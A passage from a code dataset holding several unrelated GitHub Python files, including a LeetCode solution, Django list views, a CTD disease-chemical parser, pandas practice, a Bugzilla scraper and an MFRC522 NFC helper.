soma_goblins = 0\n while True:\n F, M, G = map(int, input().split())\n if F == 0 and M == 0 and G == 0:\n break\n elif P < F:\n soma_meloes += M\n soma_goblins += G\n print(f'Meloes roubados: {soma_meloes}')\n print(f'Goblins resgatados: {soma_goblins}')\n print('---')\n else:\n print(f'Meloes roubados: {soma_meloes}')\n print(f'Goblins resgatados: {soma_goblins}')\n print('---')\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"joseneto0/G4M3","sub_path":"1.5.py","file_name":"1.5.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38538104111","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n # node=TreeNode(nums[int(len(nums)/2)])\n # node.left,node.right=TreeNode(nums[int(len(nums)/3)]),TreeNode(nums[int(len(nums)/1.5)])\n if not nums: return\n mid_i=(len(nums)-1)//2\n node=TreeNode(nums[mid_i])\n node.left=self.sortedArrayToBST(nums[:mid_i])\n node.right=self.sortedArrayToBST(nums[mid_i+1:])\n return node","repo_name":"sethGu/leetcode","sub_path":"leetcode/108_将有序数组转换为二叉搜索树.py","file_name":"108_将有序数组转换为二叉搜索树.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41083858097","text":"from django.shortcuts import render\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import (\n generics, \n viewsets\n)\n\nfrom apps.menu.models import (\n FoodCategory,\n Topping, \n Food\n)\nfrom apps.menu.serializers import (\n ToppingSerializer,\n FoodSerializer, \n FoodCategorySerializer\n)\n\n\nclass ToppingListAPIView(generics.ListAPIView):\n queryset = Topping.objects.all()\n serializer_class =ToppingSerializer\n\n\nclass FoodCategoryListAPIView(generics.ListAPIView):\n queryset = FoodCategory.objects.filter(is_publish=True).prefetch_related('foods')\n serializer_class = 
FoodCategorySerializer\n\n\nclass FoodListAPIView(generics.ListAPIView):\n    queryset = Food.objects.filter(is_publish=True)\n    serializer_class = FoodSerializer\n\n    def get_queryset(self):\n        queryset = super().get_queryset()\n        is_vegan = self.request.query_params.get('is_vegan')\n        if is_vegan is not None:\n            queryset = queryset.filter(is_vegan=is_vegan)\n        is_special = self.request.query_params.get('is_special')\n        if is_special is not None:\n            queryset = queryset.filter(is_special=is_special)\n        toppings = self.request.query_params.getlist('topping')\n        if toppings:\n            queryset = queryset.filter(toppings__name__in=toppings)\n        return queryset\n","repo_name":"iimgera/tz_menu","sub_path":"apps/menu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38435104008","text":"from turtle import Turtle\n\n\nclass ScoreBoard(Turtle):\n    def __init__(self):\n        super().__init__()\n        self.color(\"white\")\n        self.speed(\"fastest\")\n        self.penup()\n        self.hideturtle()\n        self.score = 0\n        # calling the scoreboard during initialization\n        self.update_scoreboard()\n\n    def update_scoreboard(self):\n        self.goto(0, 220)\n        self.write(f\"BREAK OUT Score: {self.score}\", align=\"center\", font=(\"Courier\", 40, \"normal\"))\n\n    def update_point(self):\n        self.score += 1\n        self.clear()\n        self.update_scoreboard()\n\n","repo_name":"skrindra/Day86_BreakOut_Game","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12146070190","text":"'''\nfile : make_disease_chem_ctd.py\nauthor: Viswajith Venugopal\n\nParses CTD to find disease chemical links.\n\nUsage:\npython make_disease_chem_ctd.py input_dir [--output_dir OUTPUT_DIR]\n\nPositional Arguments:\ninput_dir : The directory of the CTD files.\n\nOptional Arguments:\n--output_dir : Directory to create output files. 
Defaults to the current working directory.\n\nExample Usage:\nInput File: CTD/0416_CTD\n\nOutput directory : outputs/disease-chemical/\n\nCommand line:\npython make_disease_chem_ctd.py CTD/0416_CTD --output_dir outputs/disease-chemical/\n\nOutput: \nctd_disease_chem_parsed.tsv\n'''\n\nfrom collections import defaultdict\nimport os\nimport argparse\n\ndef get_chem_to_db(ctd_dir):\n    ctd_chem_node_fname = os.path.join(ctd_dir, 'CTD_chemicals.tsv')\n    chem_to_db_dict = {}\n    # First, we load the external database ids for each chemical.\n    with open(ctd_chem_node_fname, 'r') as ctd_gene_node_f:\n        for line in ctd_gene_node_f:\n            if line.startswith('#'):\n                continue\n            sp_line = line.strip('\\n').split('\\t')\n            chem_id = sp_line[1]\n            db_ids = sp_line[8]\n            if len(db_ids) > 0:\n                db_ids = db_ids.split('|')\n                chem_to_db_dict[chem_id] = db_ids\n\n    return chem_to_db_dict\n\ndef parse_ctd_chem_diseases(ctd_dir):\n    \n    chem_to_db_dict = get_chem_to_db(ctd_dir)\n    disease_chem_list = []\n    ctd_chem_dis_fname = os.path.join(ctd_dir, 'CTD_chemicals_diseases.tsv')\n    with open(ctd_chem_dis_fname) as in_f:\n        for line in in_f:\n            if line.startswith('#'):\n                continue\n            sp_line = line.strip('\\n').split('\\t')\n            chem_id = 'MESH:' + sp_line[1]\n            if chem_id not in chem_to_db_dict:\n                continue\n            db_id = chem_to_db_dict[chem_id][0]\n            disease_id = sp_line[4]\n            inference_score = sp_line[7]\n            if inference_score == \"\":\n                inference_score = \"0\"\n            disease_chem_list.append((disease_id, db_id,inference_score))\n\n    return disease_chem_list\n    \n\nparser = argparse.ArgumentParser(description='Parse CTD to find disease-chemical links.')\nparser.add_argument('input_dir', help='Input files directory. This should be the directory with all the CTD TSVs.')\nparser.add_argument('--output_dir', help='Directory to output files', default='.')\nargs = parser.parse_args()\n\noutput_fname = os.path.join(args.output_dir, \"ctd_disease_chem_parsed.tsv\")\n\ndisease_chem_list = parse_ctd_chem_diseases(args.input_dir)\n\nwith open(output_fname, 'w') as out_f:\n    out_f.write('#Disease Chemical links from CTD.\\n')\n    for (disease_id, db_id, iscore) in disease_chem_list:\n        out_f.write('\\t'.join([disease_id, db_id,iscore]))\n        out_f.write('\\n')\n","repo_name":"snap-stanford/miner-data","sub_path":"Disease-Chemical/make_disease_chem_ctd.py","file_name":"make_disease_chem_ctd.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"76"} +{"seq_id":"887820253","text":"import numpy as np\nimport warnings\nimport numbers\n\n#BLonD_Common imports\nfrom ..devtools import exceptions as excpt\n\n\ndef time_from_sampling(*args):\n\n    if len(args) == 1 and isinstance(args[0], numbers.Number):\n        def sample_func(time):\n            return time + args[0]\n        \n        start = 0\n        end = np.inf\n\n    else: \n        def sample_func(time):\n            for r in args:\n                if time >= r[1][0] and time < r[1][1]:\n                    return time + r[0]\n            else:\n                next_time = np.inf\n                for r in args:\n                    if time <= r[1][0] and r[1][0] < next_time:\n                        next_time = r[1][0]\n\n                return next_time\n        \n        start = np.inf\n        end = 0\n        for r in args:\n            print(r)\n            if r[1][0] < start:\n                start = r[1][0]\n            if r[1][1] > end:\n                end = r[1][1]\n    \n    return sample_func, start, end\n    \n#    resolution = 1\n#    if isinstance(resolution, numbers.Number):\n#\n#        def sample_func(time):\n#            return time + resolution\n#        \n#        start = 0\n#        end = np.inf\n#    \n#    elif isinstance(resolution, tuple):\n#        \n#        def sample_func(time):\n#            if time >= resolution[1][0] and time < resolution[1][1]:\n#                return time + resolution[0]\n#\n#            else:\n#                return 
np.inf\n# \n# start, end = resolution[1]\n# \n# elif isinstance(resolution, list):\n# \n# def sample_func(time):\n# for r in resolution:\n# if time >= r[1][0] and time < r[1][1]:\n# return time + r[0]\n# else:\n# next_time = np.inf\n# for r in resolution:\n# if time <= r[1][0] and r[1][0] < next_time:\n# next_time = r[1][0]\n#\n# return next_time\n# \n# start = np.inf\n# end = 0\n# for r in resolution:\n# if r[1][0] < start:\n# start = r[1][0]\n# if r[1][1] > end:\n# end = r[1][1]\n\n \n\n# Calculate turn numbers from a passed time_range at times given by 'resolution'\n# If resolution is a float, turn numbers evenly spaced by 'resolution' s will\n# be returned.\n# If resolution is a tuple the first element is taken as the time spacing and\n# the second element should be a length 2 iterable of start/stop time \n# for interpolation\n# If resolution is a list, each element of the list is treated the same as if\n# a tuple had been passed\ndef points_by_time(time_range, resolution = 1E-3):\n \n if isinstance(resolution, float):\n cycle_points = time_points(time_range, resolution)\n\n elif isinstance(resolution, tuple):\n cycle_points = time_points(time_range, resolution[0],\n resolution[1][0], resolution[1][1])\n\n elif isinstance(resolution, list):\n cycle_points = []\n for i in range(len(resolution)):\n if len(cycle_points) > 0:\n if (resolution[i][1][0] <\n time_range[cycle_points[-1]] + resolution[i][0]):\n\n resolution[i][1][0] = (time_range[cycle_points[-1]]\n + resolution[i][0])\n\n cycle_points += time_points(time_range, resolution[i][0],\n resolution[i][1][0], resolution[i][1][1]).tolist()\n\n else:\n raise excpt.InputError(\"resolution must be float, tuple or list\")\n\n return np.asarray(cycle_points)\n\n\n#From start:stop identify indices of time_range with 'resolution' separation.\ndef time_points(time_range, resolution = 1E-3, start = None, stop = None):\n \n if start is None:\n start = time_range[0]\n if stop is None:\n stop = time_range[-1]\n\n if start < time_range[0]:\n warnings.warn(\"Start time before cycle starts,\"+\n \" defaulting to start\")\n start = time_range[0]\n if stop > time_range[-1]:\n warnings.warn(\"Stop time after cycle ends,\"+\n \" defaulting to cycle end\")\n stop = time_range[-1]\n\n point = 0\n\n while time_range[point] < start:\n point += 1\n \n pointList = [point]\n\n while time_range[point] < stop:\n if (time_range[point] >=\n time_range[pointList[-1]]\n + resolution):\n pointList.append(point)\n point += 1\n pointList.append(point-1)\n\n return np.asarray(pointList)","repo_name":"blond-org/blond_common","sub_path":"utilities/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"13992451292","text":"# %% importing libraries\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport random\n\n# %% date generator\ndef date_generator(date, month, year, number_of_dates):\n dates = []\n number_of_days = {1:31, 3:31, 4:30, 5:31, 6:30, 7:31, 8:31, 9:30, 10:31, 11:30, 12:31}\n for _ in range(number_of_dates):\n dates.append(f'{month}/{date}/{year}')\n \n date += 1\n leap_year = False\n if month == 2:\n if year % 4 == 0 or year % 100 == 0 :\n if year % 400 != 0 :\n leap_year = True\n\n if month == 2:\n if leap_year:\n if date > 29 :\n date = 1\n month += 1\n else:\n if date > 28 :\n date = 1\n month += 1\n else:\n if date > number_of_days[month]:\n date = 1\n month += 1\n\n if month > 12:\n month = 1\n year += 1\n\n return 
dates\n \n# %% \ndef time(number_of_values):\n time = []\n l = ['AM', 'PM']\n for _ in range(number_of_values):\n hour = random.randint(1,12)\n minutes = random.randint(0,59)\n sec = random.randint(0,59)\n if hour < 10:\n hour = f'0{hour}'\n if minutes < 10:\n minutes = f'0{minutes}'\n if sec < 10:\n sec = f'0{sec}'\n time.append(f'{hour}:{minutes}:{sec} {random.choice(l)}')\n return time\n# %% variables\ndata = pd.read_csv('myFile0.csv')\n\n# %% attributes and methods note :- inplace is available every where\ndata.index\ndata.columns\ndata.axes\ndata.dtypes\ndata.shape\ndata.info()\ndata.fav_number\ndata.sum(axis=0)\ndata[['firstname', 'lastname']]\ndata['date'] = date_generator(1, 1, 2016, 1000)\n\ndata = pd.read_csv('myFile0.csv').dropna(how='all')\ndata.insert(0, column = 'date', value=date_generator(1, 1, 2016, 1000))\n\n# %% broadcasting\ndata['scoring'].add(50)\ndata['scoring']+50\ndata['scoring'].sub(50)\ndata['scoring']-50\ndata['scoring'].mul(2)\ndata['scoring']*2\n\ndata.dropna()\ndata.drop(columns = ['address', 'scoring'], index = [2, 4, 6])\n\ndata['fav_number'].fillna(0) # for just one column\ndata.fillna(0) # for whole data set\n\ndef test(x):\n length = []\n for i in x:\n length.append(len(i))\n return length\n\ndata.sort_values('firstname', key = test)\n\ndata.sort_values(['firstname', 'lastname'], ascending=[True, False], na_position = 'first')\ndata['fav_number'].fillna(1, inplace=True)\n\ndata['fav_number_rank'] = data['fav_number'].rank(ascending=False).astype(int)\ndata.sort_values('fav_number_rank').head()\n\n\n# %% data filtering\ndata[\"fav_number\"] = data[\"fav_number\"].fillna(0).astype(\"int\")\ndata.sort_values(\"fav_number\")\n \ndata[np.logical_or(data[\"fav_number\"] > 500 , data[\"fav_number\"] < 200)].head()\n#other options and , np.logical_and , & , or , |\n\ndata[data[\"firstname\"].isin([\"Sara-Ann\", \"Margette\", \"Tani\"])]\n\ndata = pd.read_csv('myFile0.csv')\n\ndata[data[\"fav_number\"].isnull()]\n\ndata[data[\"fav_number\"].notnull()]\n\ndata[data[\"fav_number\"].between(200,800)]\n\ndata['date'] = date_generator(1, 1, 1990, 1000)\ndata['date'] = pd.to_datetime(data['date'])\n\ndata[data['date'].between(datetime.datetime(1990, 2, 1), datetime.datetime(1990, 10, 1))]\n\ndata[data['date'].between('1990-02-01', '1990-10-01')]\n\n# print(time(100))\n\n\ndata['time'] = pd.to_datetime(time(1000))\n# data.head()\ndata[data['time'].between('10:00AM', '12:00PM')]\n\n# %% duplicate\n\ndata.sort_values(['firstname','lastname'], inplace=True)\n\ndata[data['firstname'].duplicated()]\n\ndata[np.logical_not(data['firstname'].duplicated())]\n\ndata[~data['firstname'].duplicated()]\n\ndata.drop_duplicates(['firstname'])\n\n# %% indexing\ndata = pd.read_csv('myFile0.csv')\ndata['date'] = date_generator(1, 1, 1990, 1000)\ndata['date'] = pd.to_datetime(data['date'])\ndata['time'] = pd.to_datetime(time(1000))\n\ndata.set_index(\"id\", inplace=True)\ndata.sort_index(inplace=True)\ndata.head()\n\ndata.loc[100, 'firstname']\n\ndata.loc[100:200] # slicing \n\n\ndata.loc[[100, 200]]\n\ndata.loc[[100, 1000]]\n\n# same as above just uses index and for slicing last index not included\ndata.iloc[0:1000:100]['firstname']\n\ndata.loc[100, ['firstname', 'lastname']]\n\ndata.loc[100, 'firstname'] = 'SSara-Ann'\ndata.loc[100, 'firstname'] #doesn't work on iloc it makes a copy\n\ndata.loc[100, 'firstname'] = 'Sara-Ann'\ndata.loc[100, 'firstname']\n\ndata.rename(columns={'firstname': 'Firstname', 'lastname': 'Lastname'}, inplace=True)\ndata.head()\n\ndata.rename(index={100:99}, 
inplace=True)\ndata.head()\n\ndata.rename(index={99:100}, inplace=True)\ndata.head()\n\ndata.rename(columns={'Firstname': 'firstname', 'Lastname': 'lastname'}, inplace=True)\ndata.head()\n# %% \ndata = pd.read_csv('myFile0.csv')\ndata['date'] = date_generator(1, 1, 1990, 1000)\ndata['date'] = pd.to_datetime(data['date'])\ndata['time'] = pd.to_datetime(time(1000))\ndata.set_index(\"id\", inplace=True)\ndata.sort_index(inplace=True)\n\ndata.query('firstname == \"Sara-Ann\"')\n\ndata.query('lastname == \"Margret\"')\n\ndata.query('id != 101')\n\ndata.query('id > 500')\n\ndata.query('id > 500 and firstname == \"Sara-Ann\"')\n\ndata.query('firstname in [\"Sara-Ann\", \"Aaren\"]')\n\ndata.drop(100) # row with id 100\n\ndata.drop(['firstname', 'lastname'], axis=1, inplace=False)\n\nFirstname = data.pop('firstname')\ndata\nFirstname\n\n# %% \ndata = pd.read_csv('myFile0.csv')\ndata['date'] = date_generator(1, 1, 1990, 1000)\ndata['date'] = pd.to_datetime(data['date'])\ndata['time'] = pd.to_datetime(time(1000))\ndata.set_index(\"id\", inplace=True)\ndata.sort_index(inplace=True)\n\ndata.sample(n=100)\ndata.sample(frac=.25)\ndata.sample(n = 3, axis=1)\n\ndata.nsmallest(10, 'fav_number')\ndata.nlargest(10, 'fav_number')\n\ndata['fav_number'].nlargest(10)\n\ndata[np.logical_and(data['firstname']=='Sara-Ann',data['lastname']=='Wyn')]\ndata.where(data['fav_number']>800).dropna(how='all')\n\ndef multiply_100(number):\n return number*100\n\ndata['fav_number'].apply(multiply_100)\n\ndef best_person(row):\n \n score = row[2]\n fav_number = row[4]\n\n if score > 800:\n return 'Great person'\n \n elif score > 500 and fav_number > 500:\n return 'Nice person'\n \n else:\n return \"I don't know\"\n\ndata.apply(best_person, axis='columns')\n\n","repo_name":"Nisarg1463/PythonAI","sub_path":"pandas_dataframe.py","file_name":"pandas_dataframe.py","file_ext":"py","file_size_in_byte":6200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7261471280","text":"#!/usr/bin/env python3\nimport sys\n\ndef get_cost(costs, row, col):\n if row < 0 or col < 0:\n return sys.maxsize\n if row >= len(costs) or col >= len(costs[0]):\n return sys.maxsize\n return costs[row][col]\n\ndef main():\n grid = []\n costs = []\n for line in sys.stdin:\n row = [int(token) for token in line.strip()]\n grid.append(row)\n costs.append([None] * len(row))\n\n width = len(grid[0])\n height = len(grid)\n\n print(grid)\n print(costs)\n print(width)\n print(height)\n\n # it costs 0 to get to the top left\n costs[0][0] = 0\n\n # we want to calculate the bottom right\n stack = [ (height - 1, width - 1) ]\n\n while stack:\n print(f'stack size = {len(stack)}')\n r, c = stack[-1]\n\n if costs[r][c] is not None:\n stack.pop()\n continue\n\n missing = False\n if get_cost(costs, r - 1, c) is None:\n stack.append((r - 1, c))\n missing = True\n if get_cost(costs, r + 1, c) is None:\n stack.append((r + 1, c))\n missing = True\n if get_cost(costs, r, c - 1) is None:\n stack.append((r, c - 1))\n missing = True\n if get_cost(costs, r, c + 1) is None:\n stack.append((r, c + 1))\n missing = True\n\n if missing:\n continue\n\n costs[r][c] = min(get_cost(costs, r - 1, c),\n get_cost(costs, r + 1, c),\n get_cost(costs, r, c - 1),\n get_cost(costs, r, c + 1)) + grid[r][c]\n stack.pop()\n\n print(costs)\n # print( calc_cost(grid, costs, height - 1, width - 1) )\n\n # queue = []\n # queue.append( (height - 1, width - 1) )\n\n # while queue:\n # next_pos = queue.pop()\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"boardwalk/aoc2021","sub_path":"aoc15/aoc15.py","file_name":"aoc15.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25519488582","text":"class Rule:\n    def check(self):\n        pass\n\n    def __init__(self, text):\n        self.text = text\n        self.vowels = ('a', 'u', 'i', 'o', 'e')\n        self.consonants = ('b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm',\n                           'n', 'p', 'q', 'r', 's', 't', 'v', 'w', 'x', 'y',\n                           'z')\n\n\nclass TwoConsonantLettersRule(Rule):\n    '''\n    Rule definition:\n\n    Two consonant letters should divide by 'u'.\n\n    Example:\n\n    hello -> heruro\n    '''\n    def check(self):\n        romaji = []\n\n        for idx, letter in enumerate(self.text):\n            syllable = letter\n            next_letter_in_bounds_of_text = idx + 1 < len(\n                self.text) and idx >= 0\n            if next_letter_in_bounds_of_text:\n                next_letter = self.text[idx + 1]\n\n                two_consonant_letters = letter in self.consonants \\\n                    and next_letter in self.consonants\n                if two_consonant_letters:\n                    syllable = letter + 'u'\n\n            romaji.append(syllable)\n\n        return ''.join(romaji)\n\n\nclass ConsonantEndingRule(Rule):\n    '''\n    Rule definition:\n\n    If word ending with consonant, 'u' should be added to end.\n    '''\n    def check(self):\n        romaji = []\n\n        for idx, letter in enumerate(self.text):\n            syllable = letter\n            next_letter_in_bounds_of_text = idx + 1 < len(\n                self.text) and idx >= 0\n            if next_letter_in_bounds_of_text:\n                next_letter = self.text[idx + 1]\n\n                consonant_ending_letters = (letter in self.consonants\n                    or letter in self.special) and next_letter == ' '\n\n                if consonant_ending_letters:\n                    syllable = letter + 'u'\n\n            romaji.append(syllable)\n\n        return ''.join(romaji)\n\n    def __init__(self, text):\n        super().__init__(text)\n        # placeholder: extra characters treated as consonant endings (none defined yet)\n        self.special = ()\n","repo_name":"atthealchemist/pyromaji","sub_path":"translators/rules.py","file_name":"rules.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17217632029","text":"# vim: set columns=80:\nimport os\nimport datetime\nimport csv\nimport urllib2\n\nimport mysite.base.helpers\n\nimport simplejson\nimport glob\nimport lxml.etree\nfrom ..search.models import Project, Bug\nimport codecs\nimport dateutil.parser\n\ndef get_tag_text_from_xml(xml_doc, tag_name, index = 0):\n    \"\"\"Given an object representing <tag>text</tag>,\n    and tag_name = 'tag', returns 'text'.\"\"\"\n    tags = xml_doc.xpath(tag_name)\n    try:\n        return tags[index].text\n    except IndexError:\n        return ''\n    assert False, \"You should not get here.\"\n\ndef count_people_involved(xml_doc):\n    \"\"\"Strategy: Create a set of all the listed text values\n    inside a <who>(text)</who> tag\n    Return the length of said set.\"\"\"\n    everyone = [tag.text for tag in xml_doc.xpath('.//who')]\n    return len(set(everyone))\n\ndef bugzilla_date_to_datetime(date_string):\n    return mysite.base.helpers.string2naive_datetime(date_string)\n\ndef who_tag_to_username_and_realname(who_tag):\n    username = who_tag.text\n    realname = who_tag.attrib.get('name', '')\n    return username, realname\n\ndef xml2bug_object(xml_fd,\n                   canonical_bug_link_format_string=\n                   'http://bugzilla.pculture.org/show_bug.cgi?id=%d'):\n    \"\"\"xml fd: xml file descriptor 'containing' information about one bug\"\"\"\n    parsed = lxml.etree.parse(xml_fd)\n    gen_miro_project = lambda x: Project.objects.get_or_create(name='Miro')[0]\n    bug_elt, = parsed.xpath('bug') # The comma asserts that the xpath() returns a list of length 1\n    return bug_elt2bug_object(bug_elt, 
canonical_bug_link_format_string, gen_miro_project)\n\ndef bug_elt2bug_dict(parsed, canonical_bug_link_format_string,\n gen_project):\n date_reported_text = get_tag_text_from_xml(parsed, 'creation_ts')\n last_touched_text = get_tag_text_from_xml(parsed, 'delta_ts')\n u, r = who_tag_to_username_and_realname(parsed.xpath('.//reporter')[0])\n bug_id = int(get_tag_text_from_xml(parsed, 'bug_id'))\n keywords_text = get_tag_text_from_xml(parsed, 'keywords')\n keywords = map(lambda s: s.strip(),\n keywords_text.split(','))\n project = gen_project(parsed)\n status = get_tag_text_from_xml(parsed, 'bug_status')\n looks_closed = status in ('RESOLVED', 'WONTFIX', 'CLOSED', 'ASSIGNED')\n\n ret = dict(\n project = project,\n title = get_tag_text_from_xml(parsed, 'short_desc'),\n description = (get_tag_text_from_xml(parsed, 'long_desc/thetext') or\n '(Empty description)'),\n status = status,\n importance = get_tag_text_from_xml(parsed, 'bug_severity'),\n people_involved = count_people_involved(parsed),\n date_reported = bugzilla_date_to_datetime(date_reported_text),\n last_touched = bugzilla_date_to_datetime(last_touched_text),\n last_polled = datetime.datetime.now(),\n submitter_username = u,\n submitter_realname = r,\n canonical_bug_link = canonical_bug_link_format_string % bug_id,\n good_for_newcomers = ('bitesized' in keywords),\n looks_closed=looks_closed)\n return ret\n\ndef bug_elt2bug_object(parsed, canonical_bug_link_format_string,\n gen_project):\n ret = Bug()\n data = bug_elt2bug_dict(parsed, canonical_bug_link_format_string, gen_project)\n for key in data:\n setattr(ret, key, data[key])\n return ret\n\ndef bugzilla_query_to_bug_ids(csv_fd):\n doc = csv.reader(csv_fd)\n try:\n doc.next() # throw away header row\n except StopIteration:\n return []\n\n bug_ids = []\n \n for row in doc:\n bug_ids.append(int(row[0]))\n\n return bug_ids\n\ndef link2bug_id(url):\n first, rest = url.split('?id=')\n return int(rest)\n\ndef bitesized_bugs_csv_fd():\n csv_url = 'http://bugzilla.pculture.org/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&field-1-0-0=bug_status&field-1-1-0=product&field-1-2-0=keywords&keywords=bitesized&product=Miro&query_format=advanced&remaction=&type-1-0-0=anyexact&type-1-1-0=anyexact&type-1-2-0=anywords&value-1-0-0=NEW%2CASSIGNED%2CREOPENED&value-1-1-0=Miro&value-1-2-0=bitesized&ctype=csv'\n csv_fd = urllib2.urlopen(csv_url)\n return csv_fd\n\ndef open_xml_url(xml_url):\n return urllib2.urlopen(xml_url)\n \ndef grab_miro_bugs():\n '''Input: Nothing.\n\n Side-effect: Loops over the Miro bitesized bugs (in the Miro bug tracker) and stores/updates them in our DB.'''\n csv_fd = bitesized_bugs_csv_fd()\n\n old_bitesized_bugs = Bug.all_bugs.filter(canonical_bug_link__startswith='http://bugzilla.pculture.org/')\n old_bitesized_bug_ids = [link2bug_id(k.canonical_bug_link) for k in old_bitesized_bugs]\n \n current_bitesized_bug_ids = bugzilla_query_to_bug_ids(csv_fd)\n\n bug_ids = current_bitesized_bug_ids + old_bitesized_bug_ids\n\n for bug_id in bug_ids:\n xml_url = 'http://bugzilla.pculture.org/show_bug.cgi?ctype=xml&id=%d' % bug_id\n xml_fd = open_xml_url(xml_url)\n bug = xml2bug_object(xml_fd)\n\n # If there is already a bug with this canonical_bug_link in the DB, just delete it.\n bugs_this_one_replaces = Bug.all_bugs.filter(canonical_bug_link=\n bug.canonical_bug_link)\n for delete_me in bugs_this_one_replaces:\n delete_me.delete()\n\n # With the coast clear, we save the bug we just extracted from the Miro tracker.\n 
bug.save()\n","repo_name":"rafpaf/OpenHatch","sub_path":"mysite/customs/miro.py","file_name":"miro.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"40388595396","text":"import MFRC522\n\n# This is the default key for authentication\nAUTH_KEY_DEFAULT = [0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]\n#metainfoSector\nSECTOR_META_INFO = 1\n# StartSector\nSECTOR_DATA_START = 4\n\ndef isInt(v):\n    try: i = int(v)\n    except: return False\n    return True\n\n# Method to read a sector content\ndef read_Sector(MIFAREReader, uid, key, sector):\n    retVal = \"\"\n\n    # Authenticate the sector\n    status = MIFAREReader.MFRC522_Auth(MIFAREReader.PICC_AUTHENT1A, sector, key, uid)\n\n    # Check if authenticated\n    if status == MIFAREReader.MI_OK:\n        #Read the data\n        data = MIFAREReader.MFRC522_Read(sector)\n        for i in data:\n            if(i != 0):\n                retVal = retVal + chr(i) \n            else:\n                break\n    else:\n        print(\"Authentication error sector %s\" % sector)\n\n    return retVal\n\ndef read_Metadata(MIFAREReader, uid, key):\n    dataSize = 0\n    data = read_Sector(MIFAREReader, uid, key, SECTOR_META_INFO)\n    print(\"Metadata is '%s'\" % data)\n    if(isInt(data)):\n        dataSize = int(data)\n    return dataSize\n    \n\ndef write_Metadata(MIFAREReader, uid, key, data):\n    dataSize = str(len(data))\n    write_Sector(MIFAREReader, uid, key, SECTOR_META_INFO, dataSize)\n\ndef clear_Metadata(MIFAREReader, uid, key):\n    write_Sector(MIFAREReader, uid, key, SECTOR_META_INFO, \"\")\n\ndef clear_Sector(MIFAREReader, uid, key, sector):\n    write_Sector(MIFAREReader, uid, key, sector, \"\")\n\n# Method to write a sector content\ndef write_Sector(MIFAREReader, uid, key, sector, data):\n    if sector == 0 or sector % 4 == 3:\n        print(\"Sector %s can't be written\" % sector)\n    \n    # Variable for the data to write\n    byteData = bytearray()\n    byteData.extend(data.encode('latin-1')) \n\n    #Fill rest of the array with 0x00\n    while len(byteData) < 16:\n        byteData.append(0x00)\n    \n    if(len(byteData) == 16): \n        write_SectorBytes(MIFAREReader, uid, key, sector, byteData)\n    else:\n        print(\"Data is too long: %s bytes ('%s')\" % (len(data), data))\n\n\n# Method to write raw bytes to a sector\ndef write_SectorBytes(MIFAREReader, uid, key, sector, byteData):\n\n    # Authenticate the sector\n    status = MIFAREReader.MFRC522_Auth(MIFAREReader.PICC_AUTHENT1A, sector, key, uid)\n\n    if status == MIFAREReader.MI_OK:\n        if(len(byteData) == 16): \n            print(\"Sector %s will now be filled with '%s'\" % (sector, str(byteData)))\n            # Write the data\n            MIFAREReader.MFRC522_Write(sector, byteData)\n        else:\n            print(\"Data is too long: %s bytes ('%s')\" % (len(byteData), str(byteData)))\n    else:\n        print(\"Authentication error sector %s\" % sector)","repo_name":"gsaurer/python-sonos-nfc","sub_path":"NFCHelper.py","file_name":"NFCHelper.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"74110238964","text":"import cv2\r\nimport numpy as np\r\nimport cv2.aruco as aruco\r\n\r\nfrom additionalFunctions import *\r\n\r\n\r\n# --------------------- Aruco Markers --------------------------\r\ndef cornerPointsAndH(frame1, markerOfInterest=0, drawFrame=True):\r\n    '''\r\n    finds one arucoMarker of selected Id and returns its pose\r\n    in camera CS.\r\n    It also returns corners of all markers found in the frame\r\n    (sorted with id's ascending)\r\n    '''\r\n    gray = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)\r\n    aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)\r\n    
